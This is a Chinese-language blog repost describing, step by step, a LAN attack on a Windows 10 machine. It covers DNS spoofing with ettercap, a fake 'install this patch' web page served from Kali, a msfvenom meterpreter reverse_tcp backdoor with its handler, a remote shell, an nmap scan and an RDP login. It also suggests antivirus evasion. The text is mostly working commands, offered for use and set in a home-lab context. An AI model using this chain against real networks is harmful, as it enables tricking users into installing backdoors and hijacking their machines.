内网渗透

内网渗透小计之dns欺骗配合Msf渗透Windows全过程

字号+ 作者:i春秋研习社 来源:转载 2017-03-09 14:01 我要评论( )

标题:内网渗透小计之dns欺骗配合Msf渗透Windows全过程 作者:小爱_Joker 难度:两级 攻击者IP:192.168.0.4 受害者IP:192.168.0.3 长话短说 进入实战过程 我们先......

标题:内网渗透小计之dns欺骗配合Msf渗透Windows全过程
作者:小爱_Joker
难度:两级

攻击者IP:192.168.0.4
受害者IP:192.168.0.3

长话短说 进入实战过程 ↓
我们先来用ifconfig 来查看一下我们在内网中的ip地址

建议各位配一张外置usb网卡
接着我们来修改ettercap的dns配置文件
配置文件在/etc/ettercap的etter.dns目录下
我们可以直接在终端用命令打开

[AppleScript] 纯文本查看 复制代码
?
1
gedit /etc/ettercap/etter.dns

修改一下ip  
[AppleScript] 纯文本查看 复制代码
?
1
2
*                  A   192.168.0.4
*                  PTR 192.168.0.4   //把对方dns解析到kali上


保存
打开apache2 服务器

[AppleScript] 纯文本查看 复制代码
?
1
service apache2 start //打开apache2 服务器


我们来测试下是否打开了
本机打开192.168.0.4 查看下

可见成功打开我们的kali index.html主页
index.html主页在/var/www/html/下
这里我们构造一个网页 就是那种警告你电脑有xx漏洞下载xx补丁打开安装的xx界面
我直接弄个简单的 不是特别会写html

[AppleScript] 纯文本查看 复制代码
?
1
gedit /var/www/html/index.html


这个test.exe 是我用msf生成的后门


[AppleScript] 纯文本查看 复制代码
?
1
2
3
4
msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP  -f exe -o /root/桌面/test.exe  //生成后门
msf > use exploit/multi/handler  //使用模块
msf exploit(handler) > set lhost IP  //设置kali的ip  不知道的可以ifconfig 查看一下
msf exploit(handler) > run   //监听


配置成功后我们来用ettercap 来劫持dns

使用ettercap

[AppleScript] 纯文本查看 复制代码
?
1
ettercap -G //打开图形化界面



wlan0是我的网卡名称 不知道的可以ifconfig 来查看一下  看图片






选择dns_spoof  双击

开始欺骗


接着我这台win10机打开任何网页都会显示为

这里我作为一个受害者 下载后门 我本机关闭了360 各位可以做一些免杀   成功反弹会话

[AppleScript] 纯文本查看 复制代码
?
1
shell //反弹shell


接着我们各位骚提权

扫描开放端口  
[AppleScript] 纯文本查看 复制代码
?
1
nmap 192.168.0.3  //扫描开放端口


本机我提前开放了允许内网主机连接


远程连接下

[AppleScript] 纯文本查看 复制代码
?
1
rdesktop 192.168.0.3





本文来自: 蜗蜗侠's Blog-关注网络安全 http://blog.icxun.cn/hack/Intranet/592.html

1.本站遵循行业规范,任何转载的稿件都会明确标注作者和来源;2.本站的原创文章,请转载时务必注明文章作者和来源,不尊重原创的行为我们将追究责任;3.作者投稿可能会经我们编辑修改或补充。

相关文章
网友点评
暂时未开启评论功能~